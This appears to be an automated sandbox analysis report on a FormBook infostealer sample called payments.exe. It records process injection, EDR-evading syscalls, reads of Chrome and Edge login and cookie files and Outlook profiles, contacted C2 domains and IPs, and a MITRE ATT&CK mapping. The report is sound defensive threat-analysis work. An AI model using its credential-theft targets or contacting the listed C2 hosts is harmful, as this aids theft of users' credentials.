                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtQueryInformationToken: Direct from: 0x77542CAC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtTerminateThread: Direct from: 0x77542FCC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtDeviceIoControlFile: Direct from: 0x77542AEC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtQueryValueKey: Direct from: 0x77542BEC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtQueryVolumeInformationFile: Direct from: 0x77542F2C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtOpenSection: Direct from: 0x77542E0C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtAllocateVirtualMemory: Direct from: 0x775448EC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtSetInformationThread: Direct from: 0x775363F9
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtQuerySystemInformation: Direct from: 0x775448CC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtClose: Direct from: 0x77542B6C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtReadVirtualMemory: Direct from: 0x77542E8C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtCreateKey: Direct from: 0x77542C6C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtSetInformationThread: Direct from: 0x77542B4C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtQueryAttributesFile: Direct from: 0x77542E6C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtOpenKeyEx: Direct from: 0x77543C9C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtCreateUserProcess: Direct from: 0x7754371C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtQueryInformationProcess: Direct from: 0x77542C26
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtResumeThread: Direct from: 0x77542FBC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtWriteVirtualMemory: Direct from: 0x7754490C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtDelayExecution: Direct from: 0x77542DDC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtAllocateVirtualMemory: Direct from: 0x77542BFC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtReadFile: Direct from: 0x77542ADC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtQuerySystemInformation: Direct from: 0x77542DFC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtResumeThread: Direct from: 0x775436AC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtNotifyChangeKey: Direct from: 0x77543C2C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtCreateMutant: Direct from: 0x775435CC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtWriteVirtualMemory: Direct from: 0x77542E3C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtMapViewOfSection: Direct from: 0x77542D1C
                Source: C:\Users\user\Desktop\payments.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\pcaui.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: NULL target: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe protection: read write
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: NULL target: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\pcaui.exe | Thread register set: target process: 7900
                Source: C:\Windows\SysWOW64\pcaui.exe | Thread APC queued: target process: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                Source: C:\Users\user\Desktop\payments.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2D1F008
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CCB106 LogonUserW
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00C93D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CD411C SendInput,keybd_event
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CD74E7 mouse_event
                Source: C:\Users\user\Desktop\payments.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\payments.exe"
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | Process created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"
                Source: C:\Windows\SysWOW64\pcaui.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CCA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CD71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: XhwUfLdILQipZF.exe, 00000003.00000002.3798645049.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000000.1375336937.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3798657257.0000000001861000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: payments.exe, XhwUfLdILQipZF.exe, 00000003.00000002.3798645049.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000000.1375336937.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3798657257.0000000001861000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: XhwUfLdILQipZF.exe, 00000003.00000002.3798645049.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000000.1375336937.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3798657257.0000000001861000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: payments.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: XhwUfLdILQipZF.exe, 00000003.00000002.3798645049.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000000.1375336937.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3798657257.0000000001861000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB65C4 cpuid 0_2_00CB65C4
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00CE091D
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00D0B340 GetUserNameW,0_2_00D0B340
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CC1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00CC1E8E
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CADDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00CADDC0

                Stealing of Sensitive Information

                Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000004.00000002.3800852385.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.1455387044.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.3793634224.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.3800786167.0000000004370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3803049222.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.1456263515.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.1455910755.0000000003620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.3800781510.0000000003710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\pcaui.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: payments.exe; Binary or memory string: WIN_81
                Source: payments.exe; Binary or memory string: WIN_XP
                Source: payments.exe; Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: payments.exe; Binary or memory string: WIN_XPe
                Source: payments.exe; Binary or memory string: WIN_VISTA
                Source: payments.exe; Binary or memory string: WIN_7
                Source: payments.exe; Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000004.00000002.3800852385.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.1455387044.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.3793634224.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.3800786167.0000000004370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3803049222.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.1456263515.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.1455910755.0000000003620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.3800781510.0000000003710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\payments.exe; Code function: 0_2_00CE8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\payments.exe; Code function: 0_2_00CE923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                MITRE ATT&CK Matrix (listed per tactic; the number in parentheses is the count of matching signatures, and techniques without a number had no match in this analysis)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Native API (3); Command and Scripting Interpreter (2); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
                Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
                Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph ID: 1560289; Sample: payments.exe; Startdate: 21/11/2024; Architecture: WINDOWS; Score: 100

                Start
                  DNS/IP: www.rtpterbaruwaktu3.xyz; www.54248711.xyz (Performs DNS queries to domains with low reputation); 16 other IPs or domains
                  Signatures: Antivirus detection for URL or domain; Yara detected FormBook; Binary is likely a compiled AutoIt script file; 3 other signatures
                  -> payments.exe 2 (started)
                     Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                     -> svchost.exe (started)
                        Signatures: Maps a DLL or memory area into another process
                        -> XhwUfLdILQipZF.exe (injected)
                           Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                           -> pcaui.exe 13 (started)
                              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                              -> XhwUfLdILQipZF.exe (injected)
                                 DNS/IP: rtpterbaruwaktu3.xyz 103.21.221.87, ports 49769, 80, LINKNET-ID-APLinknetASNID, unknown; www.54248711.xyz 161.97.142.144, ports 50011, 50012, 50013, CONTABODE, United States; 13 other IPs or domains
                                 Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                              -> firefox.exe (started)

                Source / Detection / Scanner / Label / Link
                payments.exe / 100% / Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source / Detection / Scanner / Label / Link (URLs)
                Name / IP / Active / Malicious / Antivirus Detection / Reputation (domains)
                Name / Malicious / Antivirus Detection / Reputation (contacted URLs)
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://dts.gnpge.com | XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/pics/28903/search.png) | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://cdn.consentmanager.net | pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://www.matteicapital.online/Funds.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxwvd | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.bt.cn/?from=404 | pcaui.exe, 00000004.00000002.3802641063.00000000057AE000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003DAE000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://www.google.com | pcaui.exe, 00000004.00000002.3802641063.00000000052F8000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.00000000038F8000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2 | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxw | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://www.matteicapital.online/Home_Equity_Rates.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://delivery.consentmanager.net | pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2 | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/pics/29590/bg1.png) | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
